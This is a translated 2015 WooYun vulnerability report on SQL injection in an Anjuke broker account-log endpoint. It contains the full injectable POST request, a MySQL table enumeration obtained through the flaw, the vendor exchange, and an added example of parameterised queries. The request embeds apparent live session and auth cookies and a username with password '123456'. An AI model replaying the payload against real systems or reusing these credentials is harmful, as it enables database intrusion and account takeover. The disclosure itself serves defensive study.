
Vulnerability summary

Defect ID: wooyun-2015-0147950

Title: SQL injection in an important Anjuke site

Vendor: Anjuke (安居客)

Author: 沦沦

Submitted: 2015-10-20 09:33

Fixed: 2015-12-04 10:10

Published: 2015-12-04 10:10

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org. For questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-10-20: Details sent to the vendor; awaiting vendor response
2015-10-20: Vendor confirmed; details visible to the vendor only
2015-10-30: Details disclosed to core white hats and domain experts
2015-11-09: Details disclosed to regular white hats
2015-11-19: Details disclosed to intern white hats
2015-12-04: Details disclosed to the public

Brief description:

As the title states.

Detailed description:

POST /ajkbroker/combo/account/accountlog/ HTTP/1.1
Host: my.anjuke.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://my.anjuke.com/ajkbroker/combo/account/accountlog
Cookie: sessid=0D0EAA87-50D7-B260-1C7A-0B8B4B83042C; aQQ_ajkguid=26548930-F7AA-051F-9798-4D2B041ADD03; lps=http%3A%2F%2Fqingdao.zu.anjuke.com%2F%3Ffrom%3Dganji_pc_list_tab%7Chttp%3A%2F%2Fqd.ganji.com%2Ffang1%2Fa2%2F; ctid=15; twe=2; __xsptplus8=8.1.1445301187.1445302691.27%233%7Cqd.ganji.com%7C%7C%7C%7C%23%23vOb9WrRHO4vxZZSk7-3LL8MimjbyBQXb%23; als=0; ajk_member_captcha=94d9e25669d24705d9e26e19445f3552; _ga=GA1.2.2099664147.1445301245; Hm_lvt_c5899c8768ebee272710c9c5f365a6d8=1445301246; Hm_lpvt_c5899c8768ebee272710c9c5f365a6d8=1445302655; lui=261923%3A2; history=%2Fapi%2Flogin%2Fsubmit%3Fusername%3Dchenqiang%26password%3D123456%26remember%3Dtrue%26callback%3Dwindow.user.callbackDetail; UserType=2; me=1; aQQ_hzweb_uid=261923; jp_auth_info_new=v%2F4swQte7PeQh9FKGlERi%2BMDuFMvYBfHyAgjInnzlw2B3w; NewGuide=11171%405%3AId%26304800%2CBI%2611171%2CGT%265%2CGS%261%3B6581%405%3AId%26302174%2CBI%266581%2CGT%265%2CGS%261%7C1%3AId%26273311%2CBI%266581%2CGT%261%2CGS%261%3B66325%405%3AId%26335264%2CBI%2666325%2CGT%265%2CGS%261%3B74884%405%3AId%26340171%2CBI%2674884%2CGT%265%2CGS%261; ckimarkednum_343179=0; isp=true; PHPSESSID=5m5js7jmdr6lame8rfrjcd42t0; tuangou_list_ids=1%3A1; _gat=1; aQQ_modbbsadminauthinfos=tvlwxQ5W7P7Zk4ULWAtqmd0Ztkc%2FL0if9VhwcC64wRbk2CJci5gtTw; aQQ_Memberauthinfos=tKp6xg9e7aLZk4ULWAtqmd0Ztkc%2FL0if9VRsUSv%2FzATEqxpRiJkvT7jxCUzq; aQQ_haozuusername=%E7%8E%8B%E7%8E%89%E6%A2%85%7Cbroker%7Chttp%3A%2F%2Fmy.anjuke.com%2Fmy%2Fhome%2F%7Chttp%3A%2F%2Fagent.anjuke.com%2Fmy%2Flogout%2F; aQQ_Brokerauthinfos=svx4kFsCvvXZloQFXwlW541E5Ax6cRzDyQQgGHz%2BmHCClh0uiN1WOYHwNHHtRIUYdpEe0PsBZiU0fa27aAO6YP98kg; jp_member_id=1055754; jp_auth_info=5ec86848bee10868fbd41935e3db230c; usertype=2; aQQ_ajkauthinfos=4%2F5wlVoC76fZk4ULWAtqttVAkW0wS0nEuklMIiX7zGvh0iJWtJwUTrz1NXboRYEbeqka7%2F89biM0fa2GagSyavxElQuchKw; ajk_member_name=wangyumei; ckimarkednum_261923=0; ajk_member_id=261923
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
logtype=*&ff=2015-09-21*&f=&tt=2015-10-20*&t=*


The logtype parameter is not filtered before being used in the query (the asterisks in the POST body above mark the injection points that were tested).

[Screenshots 1.png, 2.jpg, 3.jpg and 4.png omitted: injection test output for the request above]


Enumerated database: mysql
[28 tables]
+---------------------------+
| user |
| columns_priv |
| db |
| event |
| func |
| general_log |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| innodb_index_stats |
| innodb_table_stats |
| ndb_binlog_index |
| plugin |
| proc |
| procs_priv |
| proxies_priv |
| servers |
| slave_master_info |
| slave_relay_log_info |
| slave_worker_info |
| slow_log |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
+---------------------------+

Proof of vulnerability: (same request and table enumeration output as in the detailed description above)


Suggested fix:

Filter and validate the parameters (logtype, ff, f, tt, t) before they reach the query.
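As an added example (not code from the original report or from Anjuke), the pattern behind the suggested fix: the same account-log lookup written once with the logtype and date parameters concatenated into SQL, and once with whitelist validation plus bound parameters. The table name, columns, sample rows and the set of valid logtype codes are assumptions made for the demo.

```python
import re
import sqlite3

# Assumed fixed set of log-type codes accepted by the accountlog endpoint.
ALLOWED_LOGTYPES = {"1", "2", "3"}
DATE_RE = re.compile(r"^\d{4}-\d{2}-\d{2}$")


def make_db():
    # Constructed in-memory stand-in for the account-log table.
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE accountlog(id INTEGER, logtype TEXT, "
                "logdate TEXT, memo TEXT)")
    con.executemany("INSERT INTO accountlog VALUES (?, ?, ?, ?)", [
        (1, "1", "2015-09-25", "recharge"),
        (2, "2", "2015-10-01", "consume"),
        (3, "2", "2015-10-19", "consume"),
    ])
    return con


def query_unsafe(con, logtype, ff, tt):
    # The defect described in the report: request values pasted into SQL,
    # so a quote in logtype changes the WHERE clause instead of matching data.
    sql = ("SELECT id FROM accountlog WHERE logtype='%s' "
           "AND logdate BETWEEN '%s' AND '%s' ORDER BY id" % (logtype, ff, tt))
    return [row[0] for row in con.execute(sql)]


def query_safe(con, logtype, ff, tt):
    # Hardened form: reject anything outside the expected value space first,
    # then let the driver bind the values so they can never be parsed as SQL.
    if logtype not in ALLOWED_LOGTYPES:
        raise ValueError("invalid logtype")
    if not (DATE_RE.match(ff) and DATE_RE.match(tt)):
        raise ValueError("invalid date")
    sql = ("SELECT id FROM accountlog WHERE logtype=? "
           "AND logdate BETWEEN ? AND ? ORDER BY id")
    return [row[0] for row in con.execute(sql, (logtype, ff, tt))]
```

With a legitimate logtype both functions return the same rows; with a quote-bearing logtype the unsafe query returns every row in the date range while the safe one refuses the input.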

Copyright notice: when reposting, credit the source as 沦沦@乌云


Vendor response

Vendor response:

Severity: High

Vulnerability Rank: 17

Confirmed: 2015-10-20 10:08

Vendor reply:

Thank you for supporting Anjuke!

Latest status:

None yet


Vulnerability comments:

Comments

  1. 2015-10-20 10:15 | Anjuke (WooYun vendor)

    Hello @沦沦, could you add QQ 786023382 so we can discuss in detail?

  2. 2015-10-20 10:22 | 紫霞仙子 ( regular white hat | Rank:2107 vulnerabilities:294 | Onward and upward!!! )

    What is this about? Picking on me and 沦沦?

  3. 2015-10-20 10:24 | 沦沦 ( regular white hat | Rank:586 vulnerabilities:138 | Love my wife, love life )

    @紫霞仙子 What am I supposed to do :)

  4. 2015-10-20 10:24 | 专业种田 certified white hat ( core white hat | Rank:1483 vulnerabilities:189 | There is no most professional farmer, only one who tills harder.......... )

    @紫霞仙子 Don't worry, they're just sending a Mac.

  5. 2015-10-20 10:38 | king7 ( regular white hat | Rank:645 vulnerabilities:113 | Buying WB~~1:7, fee negotiable, single to triple digits... )

    Now that is something I am not happy about